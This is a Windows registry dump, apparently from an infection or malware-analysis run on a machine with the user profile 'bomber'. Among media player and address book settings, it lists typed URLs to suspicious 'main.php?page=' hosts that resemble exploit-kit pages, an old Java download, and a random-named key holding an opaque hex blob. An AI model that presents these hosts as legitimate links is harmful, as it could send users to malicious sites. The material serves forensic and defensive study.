HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server ID dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere Account Name "WhoWhere Internet Directory Service"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server "ldap.whowhere.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP URL "http://www.whowhere.com"
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Search Return dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Timeout dword:0000003c
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Authentication dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Simple Search dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,
HKEY_CURRENT_USER\Software\Microsoft\Rowi
HKEY_CURRENT_USER\Software\Microsoft\Rowi Xoywarsu hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,
HKEY_CURRENT_USER\Software\Microsoft\Siabvu
HKEY_CURRENT_USER\Software\Microsoft\WAB
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4 OlkContactRefresh dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4 OlkFolderRefresh dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4 FirstRun dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name
HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name @ "C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FriendlyName "Default MidiOut Device"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device CLSID "{07B65360-C445-11CE-AFDE-00AA006C14F4}"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device MidiOutId dword:ffffffff
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FriendlyName "Default DirectSound Device"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device CLSID "{79376820-07D0-11CF-A24D-0020AFD79767}"
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device DSGuid "{00000000-0000-0000-0000-000000000000}"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy CleanCookies dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowClosedTabs dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowActivities dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar CompatibilityViewButtonBalloonCount dword:00000001 dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active {8CFA7582-04D2-11E2-A16C-08002765500A} dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active {E4F1361D-04D0-11E2-A16B-08002765500A} dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url1 "http://www.google.com/" "http://46.249.59.116/main.php?page=5a56c997ffff2f79"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url2 "http://google.com/" "http://www.google.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url3 "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775" "http://ns8.ns360.info/main.php?page=f61d19dee2176c62"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url4 "http://urlquery.net/" "http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url5 "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC" "http://urlquery.net/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url6 "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html" "http://google.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url7 "http://oldversion.com/" "http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url8 "http://go.microsoft.com/fwlink/?LinkId=69157" "http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url9 "http://oldversion.com/"
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs url10 "http://go.microsoft.com/fwlink/?LinkId=69157"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332} AttemptedAutoRun dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4} AttemptedAutoRun dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz Prefs "mute;False"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying InitFlags dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowHorizontalSeparator dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowVerticalSeparator dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistWidth dword:000000ba
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistHeight dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsWidth dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsHeight dword:00000087
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataWidth dword:000000ba
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataHeight dword:000000a0
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying CaptionsHeight dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings Client ID "{43209BE6-BD53-40A7-9DD3-50364635A3E4}"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences AcceptedPrivacyStatement dword:00000000 dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences MetadataRetrieval dword:00000003
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences SendUserGUID hex:00,
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences SilentAcquisition dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UsageTracking dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences DisableMRU dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LaunchIndex dword:00000002
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences AppColorLimited dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences FirstRun dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences X "10"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Y "10"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Width "686"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Height "536"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Maximized "0"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Volume dword:00000032
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ModeShuffle dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ModeLoop dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Mute dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences Balance dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentEffectType "Battery"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentEffectPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences VideoZoom dword:00000064
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShrinkToFit dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowEffects dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowFullScreenPlaylist dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingQuickHide dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowTitles dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowCaptions dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingPlaylist dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingMetadata dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences NowPlayingSettings dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences VizAutoSelect dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayView "VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsView "EQView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataView "MediaInfoView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserDisplayView "VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayView "VizView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsView "EQView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataView "MediaInfoView"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserDisplayPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataPreset dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPShowSettings dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences UserWMPShowMetadata dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences ShowAlbumArt dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences RandomFolderName "0009236B"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LastPlaylist hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LastPlaylistQuery ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences LastPlaylistIndex dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyStyle dword:00000001
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyName ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyPort dword:00000050
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyBypass dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyExclude ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyStyle dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyName ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyPort dword:000006db
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyBypass dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\MMS ProxyExclude ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyStyle dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyName ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyPort dword:0000022a
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyBypass dword:00000000
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\RTSP ProxyExclude ""
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions DesktopShortcut "no"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\UserOptions QuickLaunchShortcut "yes"
HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Setup\CreatedLinks Shortcut4 "C:\Documents and Settings\bomber\Application Data\Microsoft\Internet Explorer\Quick Launch\Windows Media Player.lnk"
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache
HKEY_CURRENT_USER\Software\Microsoft\Multimedia\ActiveMovie\Filter Cache 0 hex:e0,5a,00,00,65,68,63,66,00,00,00,00,00,00,00,00,02,01,00,00,00,00,00,00,01,00,20,00,49,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,32,00,45,00,45,00,42,00,34,00,41,00,44,00,46,00,2d,00,34,00,35,00,37,00,38,00,2d,00,34,00,44,00,31,00,30,00,2d,00,42,00,43,00,41,00,37,00,2d,00,42,00,42,00,39,00,35,00,35,00,46,00,35,00,36,00,33,00,32,00,30,00,41,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,42,00,2d,00,34,00,35,00,31,00,33,00,2d,00,39,00,44,00,34,00,33,00,2d,00,44,00,43,00,44,00,32,00,41,00,36,00,35,00,39,00,33,00,31,00,32,00,35,00,7d,00,00,00,00,00,40,00,64,00,65,00,76,00,69,00,63,00,65,00,3a,00,64,00,6d,00,6f,00,3a,00,7b,00,38,00,37,00,34,00,31,00,33,00,31,00,43,00,42,00,2d,00,34,00,45,00,43,00,43,00,2d,00,34,00,34,00,33,00,42,00,2d,00,38,00,39,00,34,00,38,00,2d,00,37,00,34,00,36,00,42,00,38,00,39,00,35,00,39,00,35,00,44,00,32,00,30,00,7d,00,7b,00,35,00,37,00,46,00,32,00,44,00,42,00,38,00,42,00,2d,00,45,00,36,00,42,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU a hex:77,00,69,00,72,00,65,00,73,00,68,00,61,00,72,00,6b,00,2e,00,65,00,78,00,65,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,4d,00,79,00,20,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,00,00,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU MRUList "a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU MRUList "a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\*
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* a "C:\Documents and Settings\bomber\My Documents\pcap"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSaveMRU\* MRUList "a"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2\Programs Order hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00, hex:08,00,00,00,02,00,00,00,7c,09,00,00,01,00,00,00,0f,00,00,00,8a,00,00,00,00,00,00,00,7c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,6a,00,32,00,22,06,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,31,2e,4c,4e,4b,00,00,40,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,9a,00,00,00,01,00,00,00,8c,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,7a,00,32,00,d3,02,00,00,36,41,2b,7c,20,00,4d,49,43,52,4f,53,7e,32,2e,4c,4e,4b,00,00,50,00,03,00,04,00,ef,be,36,41,2b,7c,36,41,2b,7c,14,00,00,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,20,00,55,00,70,00,64,00,61,00,74,00,65,00,20,00,43,00,61,00,74,00,61,00,6c,00,6f,00,67,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,0e,00,00,00,0a,00,ef,be,01,00,00,00,1c,00,00,00,00,00,00,00,00,00,d2,00,00,00,02,00,00,00,c4,00,00,00,41,75,67,4d,02,00,00,00,01,00,00,00,b2,00,
